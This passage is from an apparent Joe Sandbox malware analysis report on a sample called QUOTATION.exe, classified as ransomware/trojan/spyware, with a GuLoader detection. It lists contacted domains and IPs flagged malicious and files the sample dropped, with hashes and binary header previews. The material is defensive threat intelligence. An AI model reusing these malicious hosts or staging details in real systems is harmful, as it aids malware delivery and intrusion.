                                                                                                                http://www.flaviosilva.onlineexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.dexmart.xyz/d91r/8H7gL=Bxcfm_qbbEGmexplorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.buymyenergy.comwww.184411.comexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.eta-trader.net/d91r/8H7gL=Bxcfm_qbbEGmexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.flaviosilva.onlinewww.solya-shop.comexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.aznqmd.comwww.explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://word.office.com(explorer.exe, 00000009.00000002.8021127369.000000000CEB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CEB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		low
                                                                                                                https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl_banneexplorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://browsehappy.com/explorer.exe, 00000009.00000002.8041134967.000000001562A000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.00000000050EA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.fantasticserver.yachts/d91r/ldE8Xu=oYWDxG4UFF1explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000009.00000002.8009354628.00000000096DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6310377593.00000000096DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6123718142.00000000096DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.00000000096DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.webnames.ru/help/feedback?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindowexplorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.fantasticserver.yachtswww.dhiyasecurities.comexplorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://www.buymyenergy.comexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://www.cardinialethanol.comexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://23.83.160.2:88/tz.php?ref=explorer.exe, 00000009.00000002.8041134967.00000000157BC000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.000000000527C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://www.aznqmd.comexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://www.dhiyasecurities.com/d91r/ldE8Xu=oYWDxG4UFF1explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://www.funvacayflorida.comTexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://support.google.com/chrome/?p=plugin_flashhelp.exe, 0000000A.00000002.8008447168.0000000007D80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.b-tek.mediaexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://www.ghostdyes.net/d91r/8H7gL=Bxcfm_qbbEGmexplorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown

                                                                                                                          World Map of Contacted IPs

                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs

                                                                                                                          Public IPs

                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          91.184.0.24
                                                                                                                          		www.b-tek.mediaNetherlands
                                                                                                                          		197902HOSTNETNLtrue
                                                                                                                          45.194.145.38
                                                                                                                          		www.buymyenergy.comSeychelles
                                                                                                                          		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                                          199.192.26.35
                                                                                                                          		www.dexmart.xyzUnited States
                                                                                                                          		22612NAMECHEAP-NETUStrue
                                                                                                                          217.160.0.217
                                                                                                                          		www.solya-shop.comGermany
                                                                                                                          		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                          45.56.79.23
                                                                                                                          		www.cardinialethanol.comUnited States
                                                                                                                          		63949LINODE-APLinodeLLCUStrue
                                                                                                                          154.215.156.6
                                                                                                                          		bb.zhanghonghong.comSeychelles
                                                                                                                          		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                                          34.117.168.233
                                                                                                                          		td-ccm-168-233.wixdns.netUnited States
                                                                                                                          		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                                                                                                                          104.21.45.96
                                                                                                                          		www.maxhaidt.comUnited States
                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                          81.17.18.196
                                                                                                                          		www.brightfms.comSwitzerland
                                                                                                                          		51852PLI-ASCHtrue
                                                                                                                          23.83.160.9
                                                                                                                          		www.aznqmd.comUnited States
                                                                                                                          		7203LEASEWEB-USA-SFO-12UStrue
                                                                                                                          162.240.73.101
                                                                                                                          		www.wittofitentertainment.comUnited States
                                                                                                                          		46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                          208.91.197.91
                                                                                                                          		www.funvacayflorida.comVirgin Islands (BRITISH)
                                                                                                                          		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                          81.17.29.148
                                                                                                                          		www.texasgent.comSwitzerland
                                                                                                                          		51852PLI-ASCHtrue
                                                                                                                          88.212.206.251
                                                                                                                          		www.interactive-media.ruRussian Federation
                                                                                                                          		39134UNITEDNETRUtrue
                                                                                                                          2.57.90.16
                                                                                                                          		eta-trader.netLithuania
                                                                                                                          		47583AS-HOSTINGERLTtrue

                                                                                                                          General Information

                                                                                                                          Joe Sandbox Version:37.0.0 Beryl
                                                                                                                          Analysis ID:830630
                                                                                                                          Start date and time:2023-03-20 15:14:59 +01:00
                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                          Overall analysis duration:0h 17m 15s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:light
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                          Number of analysed new started processes analysed:16
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:1
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • HDC enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample file name:QUOTATION.exe
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.rans.troj.spyw.evad.winEXE@7/11@19/15
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          HDC Information:
                                                                                                                          • Successful, ratio: 11.1% (good quality ratio 10.6%)
                                                                                                                          • Quality average: 80.9%
                                                                                                                          • Quality standard deviation: 26.8%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 84%
                                                                                                                          • Number of executed functions: 0
                                                                                                                          • Number of non-executed functions: 0
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                          Warnings

                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                          • HTTP Packets have been reduced
                                                                                                                          • TCP Packets have been reduced to 100
                                                                                                                          • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, tile-service.weather.microsoft.com, wdcp.microsoft.com
                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                          Simulations

                                                                                                                          Behavior and APIs

                                                                                                                          No simulations

                                                                                                                          Joe Sandbox View / Context

                                                                                                                          IPs

                                                                                                                          No context

                                                                                                                          Domains

                                                                                                                          No context

                                                                                                                          ASNs

                                                                                                                          No context

                                                                                                                          JA3 Fingerprints

                                                                                                                          No context

                                                                                                                          Dropped Files

                                                                                                                          No context

                                                                                                                          Created / dropped Files

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Alswith\Peroxidisement\Foresprges87\SolutionExplorerCLI.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\QUOTATION.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):75248
                                                                                                                          Entropy (8bit):6.149004775364808
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:GmY7dQU8l75gS4SqQR27YZW1cwvbTxUd6Rw:GmacliS49QR27YZW1vn2dWw
                                                                                                                          MD5:3A03B61FA01DCDFF3E595D279F159D6E
                                                                                                                          SHA1:94900C28C23AD01D311C389A0813277CFB30345C
                                                                                                                          SHA-256:4F4D6511BEC955B4E8A30371ED743EA5EBC87CEB0BF93FE21F0A378AA2C05A01
                                                                                                                          SHA-512:0D04D3486911DFE0439449554E90FB68B4D85EEE025A9B89910C306DE33CBFDBBEF1ABCAC5D4CD3B3CC1B1F445B7C67DC341C9363C9B127810ABD0498EC94AC4
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T..:..:..:....:.....:..;..:..]..:..]...:..]..:..]...:..u...:..u..:....:..u...:.Rich.:.........PE..L...w..U...........!.....:..........dG.......P...............................@.......p....@.................................<...P.... .......................0.......P..8............................R..@............P..............(Q..H............text...!8.......:.................. ..`.rdata......P.......>..............@..@.data...............................@....rsrc........ ......................@..@.reloc.. ....0......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Industrialization\Snoldets\Embrocates\Utaalmodiges.Taa169

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\QUOTATION.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):254328
                                                                                                                          Entropy (8bit):7.284609523209945
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:PRs7lL/hhpwtoHPCrwXE/Y5aBMCYDjTQXB3EZ+FhS2LYga8KB9JIopauAxqOp2xP:eh4tsCrJxMvDj8X8+FYxP3pnUqLdN
                                                                                                                          MD5:F4CC23ED0D3896E2B178E6A55C40AA4E
                                                                                                                          SHA1:370ACD45CAAE23C832BD48E3CC3D56C1107E3A51
                                                                                                                          SHA-256:F70AA179CC5D44B7605AC33C35BA47DC32A5DA0EFE494AB7C5CF132AEF6ACA0C
                                                                                                                          SHA-512:F920BB342EF61E0EC18B4C9A698821606E41B8D31A423A3B196C7ED5E804BCAE4825C0E142DB6AF1611D01C75F8B7D0D780C7A2FAC4FB4533C70FD9395E1B810
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Industrialization\Snoldets\Embrocates\Utaalmodiges.Taa169, Author: Joe Security
                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\libpkcs11-helper-1.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\QUOTATION.exe
                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):130344
                                                                                                                          Entropy (8bit):6.2622011397185
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:tKInqqVjbm+1Vi5R6QQU7k1TAH1OobTrWHEE+jFpCOx:tVzjvi5R6QQU7k1TAH1OobTrWHExFpdx
                                                                                                                          MD5:2455841538BA8A502398C18781CC3CEB
                                                                                                                          SHA1:86CFD513FEE46EBC2C35225B27372679BE6ADA91
                                                                                                                          SHA-256:F37BE7BD8C46D58CA931810536C8A2BEC36D06FF3281740FE0AD177F022AC781
                                                                                                                          SHA-512:BC1DCDDE074150616DED7EAACC3FC44BDD2487EB5E550172F5EA46432AA76F19443A9FD6CEF61577B7803C1B083FFCBCEAF9ADC3114A97B547A78C2654F757E3
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................&"....."....................\d.............................P......z.....`... .................................................X....0..................x....@.............................. ..(.......................P............................text...8!......."..................`.P`.data........@.......&..............@.`..rdata...^...P...`...(..............@.`@.pdata..............................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..X...........................@.0..CRT....X...........................@.@..tls....h.... ......................@.`..rsrc........0......................@.0..reloc.......@......................@.0B................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\maintenanceservice2.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\QUOTATION.exe
                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):227256
                                                                                                                          Entropy (8bit):6.388677533277947
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:ue/rKQgYva3o4vj272BNvIJuQlf2qIHL2:uYrK4a3PvKw7ufg2
                                                                                                                          MD5:49A2E97304EF8E044EEBD7ACCAD37E11
                                                                                                                          SHA1:7D0F26591C8BD4CAB1718E323B65706CBEA5DE7A
                                                                                                                          SHA-256:83EAFBF165642C563CD468D12BC85E3A9BAEDE084E5B18F99466E071149FD15F
                                                                                                                          SHA-512:AC206C5EF6F373A0005902D09110A95A7F5FB4F524653D30C3A65182717272FE244694A6698D40884BEA243B2CA00D7741CED796DF7AE8C633F513B8C6FCD6C8
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...J..b.........."......:.....................@....................................Y.....`..................................................................`..h....X..........................................(....P..............(...h............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data....!...0......................@....pdata..h....`.......*..............@..@.00cfg...............D..............@..@.tls.................F..............@....rsrc................H..............@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\percentile.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\QUOTATION.exe
                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):102577
                                                                                                                          Entropy (8bit):5.075179901575448
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:t9H5uXFjJeEoPsznZgkZNhFdS2E0fVnSdNPfZ5+uKIu7aQzTgp37CtHRMX6NX0:tJ5wJeEoU9g0Nhav09nahfYxDRx0
                                                                                                                          MD5:3144FDFEC817D0AC6FE3F4642B70328B
                                                                                                                          SHA1:756C3513DC10CF00B517C72B2D3AB3E20895A46C
                                                                                                                          SHA-256:BF17F5B38DCF35B55B1E0FAD462D4095ABAAA4CD8F1EDBDC8657C0249EF5D4D3
                                                                                                                          SHA-512:012D9A3B88BA5D5090E8B47B49FE50E518489AB05FAAC6A1A0743F29A369B7D67F39B8E113B34740607137F2D67D75116DBE2A76E8E1DBE699BA4973F8037684
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...rL.`.<........& ...$.....6......P................................................U....`... .........................................Y....................P..................`............................A..(....................................................text...............................`.P`.data...p....0....... ..............@.P..rdata..p....@......."..............@.`@.pdata.......P.......*..............@.0@.xdata..l....`......................@.0@.bss.........p........................`..edata..Y............0..............@.0@.idata...............2..............@.0..CRT....X............6..............@.@..tls.................8..............@.@..reloc..`............:..............@.0B/4...................<..............@.PB/19.....C............@..............@..B/31..........`......................@..B/45.............. ..................@..B/57.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\Dampning.Dub

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\QUOTATION.exe
                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):74176
                                                                                                                          Entropy (8bit):2.6722266832319854
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:NKBIx/TbxyxbZ3K4FBS/PqiqRqxmyFJcEXxedrfEf6v3Zm2:YrEXgd6u
                                                                                                                          MD5:992929F1D7A90F5CE4FCCD117E1A7DBE
                                                                                                                          SHA1:44CCBD5EBFE22ACECEFBF0CF381F99CD6015943B
                                                                                                                          SHA-256:BBA853900D50A7D6952063FAD68F534B5CB97B336B1B129F2F0717669BCF309A
                                                                                                                          SHA-512:15062430326D4964BFD07129146BADC839D253D20401F7D872BFB39A5D903C31BCF0ACEFCF3F960ADF228084CB3EC8415D5375FC8CF8B7DEB0678FCF9E44A92C
                                                                                                                          Malicious:false
                                                                                                                          Preview:0000EFEF002E00000000C5C500D0D0005300A50063005F5F5F5F5F0000A800B2B200F4F400002A2A2A2A2A00282828000000A2A2009B00005B5B5B5B5B007E000200002900006060600000004C002E2E00BDBDBDBD0000A500D8000000D400009797008C8C8C8C8C0000BBBBBB005050000000000000006E0043000000DFDF0000000000004C00740000B10056565656565600006900AAAA002E2E0000E5E50000005700000000D80000000007070000F00000000000D800EE000000000000002929000000008E8E0000BDBD00BEBEBE003400008B00000000001F000000000000003535002828007D7D7D7D009A9A9A9A9A000000DD000000CE0000F3F30043009D9D9D9D00AF0000001E001A000000000000008A8A00D6000000001600D700DB00000000000079797900737373730000D80000F2006C00737300006B6B6B6B00FC003B0000D2D2000015001818001C1C1C0000000000002000D4D400004200002B2B2B000000000000FDFDFDFDFDFD0071000000E000006969000000C3C3008E000000C400292929000000A000F3F3000008080000000900E1E1E1008C8C009494940000000000000000005E00003737000014141400000000000000000000DB00A200A5A50000FC000091000000636363630000C8C8000000F9F9003232000069005F00F0F00000A500393900666600000000

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\System.Security.Cryptography.X509Certificates.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\QUOTATION.exe
                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):485488
                                                                                                                          Entropy (8bit):6.710350474742332
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:1E5AW+0VyAaOKxFf8r6S2rGjF0KAmdHCKsCZcufvh7OzxQxQ5JVIRVrk:KGWlaOKC2a0tmFChCOFeqLIRpk
                                                                                                                          MD5:84D7B1FB924AEEFCF4A2C7A687FE2EF1
                                                                                                                          SHA1:A2C2C7DE9096328A3FEF0C7FCEA262A294C0807B
                                                                                                                          SHA-256:32A54C24B18B3C087E06F4F19885FB410304AB4AF2263154020D3F5CDCE36D99
                                                                                                                          SHA-512:E75F91DA415B15CA0B19519179021FD88C0FC68FE4EF2A68B899B121BD511C04AECCB58101318C86CB0458D7310208C358DBB9155A02D62DE73C04128ECC5934
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....fW..........." .........................................................`............`...@......@............... ...........................................1...D..p$...P.......0..T...............................................................H............text.............................. ..`.data...wy.......z..................@....reloc.......P.......:..............@..B............................................0...........................T.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...................y.........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\System.dll

                                                                                                                          Download File
